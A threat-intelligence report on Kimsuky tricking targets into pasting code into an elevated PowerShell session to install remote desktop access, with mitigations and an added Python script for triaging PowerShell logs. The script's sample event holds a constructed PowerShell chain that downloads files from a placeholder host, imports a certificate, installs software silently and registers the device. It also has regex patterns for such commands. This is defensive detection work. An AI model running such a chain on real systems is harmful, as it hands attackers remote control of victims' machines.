Full Report
The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code provided by them. "To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a
Analysis Summary
# Threat Actor: Kimsuky
## Attribution & Identity
* **Attribution:** North Korea-linked threat actor.
* **Known Aliases/Associations:** The page names no aliases for this tactic. It does mention the technique alongside the "Contagious Interview" campaign, which relies on the same copy-and-paste execution method against macOS targets.
## Activity Summary
* Observed since January 2025 using a new social-engineering tactic: the target is talked into running attacker-supplied code in an elevated PowerShell session, which hands the actor administrative control without any exploit.
* The actor masquerades as a South Korean government official and builds rapport with the target over time before delivering the lure.
* The lure ends with a link whose instructions tell the victim to launch PowerShell as an administrator and paste code supplied by the actor; that code installs a browser-based remote desktop tool, downloads a certificate with a hardcoded PIN, and registers the victim's Windows system with a remote server.
* This technique is described as a departure from the actor's usual tradecraft.
## Tactics, Techniques & Procedures
* **Spear-phishing:** Sending emails containing a deceptive PDF attachment.
* **Social Engineering:** Building rapport with the target over time.
* **Execution via User Action:** Persuading the victim to click an embedded URL that leads to instructions for running PowerShell with administrative privileges and pasting the supplied code.
* **T1059.001 (Command and Scripting Interpreter: PowerShell):** Execution of malicious code via pasted commands.
* **Remote Access and Exfiltration:** The pasted code installs a browser-based remote desktop tool, downloads a certificate with a hardcoded PIN, and registers the device with a remote server; the resulting remote session is what enables data theft. This is remote-access-tool deployment (T1219, Remote Access Software) rather than data staging.
* **Why It Works:** The victim runs the code in their own elevated, interactive session, so no malicious attachment, exploit or dropper has to pass email filtering, sandboxing or endpoint controls; the actor only needs the victim's consent.
## Targeting
* **Sectors:** Not stated for this campaign. The South Korean government masquerade suggests targets who would expect such contact (government, policy or research circles), but the page does not confirm this.
* **Geography:** Not stated; the masquerade implies South Korean or South Korea-facing targets. The page describes the attacks as limited in number.
* **Victims:** Undisclosed individuals who had been corresponding with the fake official.
## Tools & Infrastructure
* **Malware Families Used:** No named malware family is reported; the payload is a browser-based remote desktop tool that gives the actor an interactive session on the victim's machine.
* **Infrastructure:** Remote servers that host the pasted code and the certificate file (with its hardcoded PIN) and that receive the device registration. The page lists no domains, IP addresses or file hashes.
## Implications
The shift to user-assisted execution is a notable change in Kimsuky's tradecraft: because the victim runs the code themselves in an elevated session, attachment scanning and sandboxing never see a malicious file. The attacks observed so far are limited in number, but a successful one yields an interactive remote desktop session on an administrator's machine, which allows immediate data theft. Reliance on the victim's own consent for execution is becoming more common across threat actors, so defenders should expect the pattern to recur.
## Mitigations
* Treat any unsolicited request to open PowerShell as an administrator, or to paste commands copied from a web page or email, as hostile, regardless of how long the correspondent has been in contact.
* User training that covers slow, rapport-building social engineering by state-sponsored actors (for example, a contact posing as a government official), not only one-shot phishing.
* Monitor for installation of unapproved remote desktop tools, especially when the parent process is an elevated PowerShell session started by the user.
* Enable PowerShell Script Block Logging (Event ID 4104) and Module Logging, and alert on elevated interactive sessions that download files, import certificates or install services; the page does not list the specific commands used, so detection has to key on the combination of behaviours rather than on fixed strings. Limiting local administrator rights removes the elevation the lure depends on.
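The detection side of the procedure described in the TTP section (an elevated, interactive PowerShell session that downloads a certificate, uses a hardcoded PIN, installs a remote desktop tool and registers the device), serving both that section and the monitoring and logging items above, as an added Python example that is not code from the report, from Microsoft or from the actor: it triages exported PowerShell Script Block Logging (Event ID 4104) records. It assumes the events are available as dicts with ts/user/path/script keys (the export format is an assumption); the indicator regexes are generic, the sample events are constructed for the example, and the example.invalid hosts are placeholders, not indicators from the page.

```python
"""
Triage of PowerShell Script Block Logging events (Event ID 4104) for the
"run PowerShell as administrator and paste this" pattern.

Added example, not code from the report or from the actor's tooling.
Assumptions: script block logging is enabled and the events have already
been exported (e.g. from a SIEM) as dicts with the keys 'ts', 'user',
'path' and 'script'. The indicator regexes are generic building blocks of
the reported behaviour (download a file, drop a certificate with a PIN,
install a remote access tool, register with a server); the page gives no
command strings, hosts or file names, so none are encoded here. The sample
events below are constructed for the example.
"""
import re
from dataclasses import dataclass

# Generic indicators. A single hit is routine in admin scripting; the
# combination of several, inside a pasted block, is what matters.
INDICATORS = [
    ("remote_download", re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer|\bcurl\b", re.I)),
    ("certificate_material", re.compile(
        r"\.(?:pfx|cer|p12)\b|Import-PfxCertificate|Import-Certificate|-CertStoreLocation", re.I)),
    ("hardcoded_pin", re.compile(r"\b(?:pin|passcode)\s*[=:]\s*['\"]?\d{4,8}\b", re.I)),
    ("remote_access_install", re.compile(
        r"New-Service|sc\.exe\s+create|msiexec|Start-Process .*?/(?:quiet|silent|S\b)|RemoteDesktop|\brdp\b", re.I)),
    ("device_registration", re.compile(
        r"Invoke-RestMethod.*-Method\s+Post|/register\b|enrol", re.I)),
]


@dataclass
class Finding:
    ts: str
    user: str
    interactive: bool
    indicators: list
    severity: str


def triage_script_block(event, allowed_path_prefixes=()):
    """Return a Finding for one 4104 event, or None if it is not worth a look."""
    path = event.get("path") or ""
    # 4104 leaves Path empty when the block was typed or pasted into the host
    # rather than loaded from a .ps1 file: exactly what the lure produces.
    interactive = path == ""
    if any(p and path.lower().startswith(p.lower()) for p in allowed_path_prefixes):
        return None  # approved deployment location, suppressed
    hits = [name for name, rx in INDICATORS if rx.search(event.get("script", ""))]
    if len(hits) < 2:
        return None  # one download or one install on its own is noise
    credential_drop = {"certificate_material", "hardcoded_pin"}.intersection(hits)
    if interactive and "remote_download" in hits and credential_drop:
        severity = "high"    # pasted code that fetches and installs credentials
    elif interactive or len(hits) >= 3:
        severity = "medium"
    else:
        severity = "low"     # scripted from disk; worth a look, usually routine
    return Finding(event["ts"], event["user"], interactive, hits, severity)


def triage_events(events, allowed_path_prefixes=()):
    """Run triage over an exported batch and keep only the reportable events."""
    findings = [triage_script_block(e, allowed_path_prefixes) for e in events]
    return [f for f in findings if f is not None]


# Constructed sample events (not from the page). Hosts are placeholders.
SAMPLE_EVENTS = [
    {   # pasted block, no script path, full chain present
        "ts": "2025-02-12T09:14:03Z", "user": "CORP\\jkim", "path": "",
        "script": (
            '$pin = "123456"\n'
            'Invoke-WebRequest -Uri "https://example.invalid/device.pfx" -OutFile "$env:TEMP\\device.pfx"\n'
            'Import-PfxCertificate -FilePath "$env:TEMP\\device.pfx" -CertStoreLocation Cert:\\LocalMachine\\My '
            '-Password (ConvertTo-SecureString $pin -AsPlainText -Force)\n'
            'Start-Process msiexec.exe -ArgumentList "/i $env:TEMP\\rd.msi /quiet" -Wait\n'
            'Invoke-RestMethod -Method Post -Uri "https://example.invalid/register" -Body @{pin=$pin}\n'),
    },
    {   # approved deployment script run from disk
        "ts": "2025-02-12T09:20:41Z", "user": "CORP\\svc-deploy", "path": "C:\\Scripts\\Install-Agent.ps1",
        "script": ('Invoke-WebRequest -Uri "https://updates.example.invalid/agent.msi" -OutFile agent.msi\n'
                   'Start-Process msiexec.exe -ArgumentList "/i agent.msi /quiet" -Wait\n'),
    },
    {   # ordinary interactive use
        "ts": "2025-02-12T09:31:10Z", "user": "CORP\\jkim", "path": "",
        "script": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5\n",
    },
    {   # a single download on its own, below threshold
        "ts": "2025-02-12T09:35:55Z", "user": "CORP\\jkim", "path": "",
        "script": 'Invoke-WebRequest -Uri "https://example.invalid/readme.txt" -OutFile readme.txt\n',
    },
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{f.ts} {f.user} interactive={f.interactive} {f.severity}: {', '.join(f.indicators)}")
```

The empty-Path heuristic is the part that ties the detection to this tradecraft: code a victim pastes into a console is logged without a file path, whereas legitimate automation almost always runs from a script on disk, which is why an allowlist of deployment directories is enough to quiet the routine cases. Thresholds and regexes are starting points to tune against your own 4104 volume.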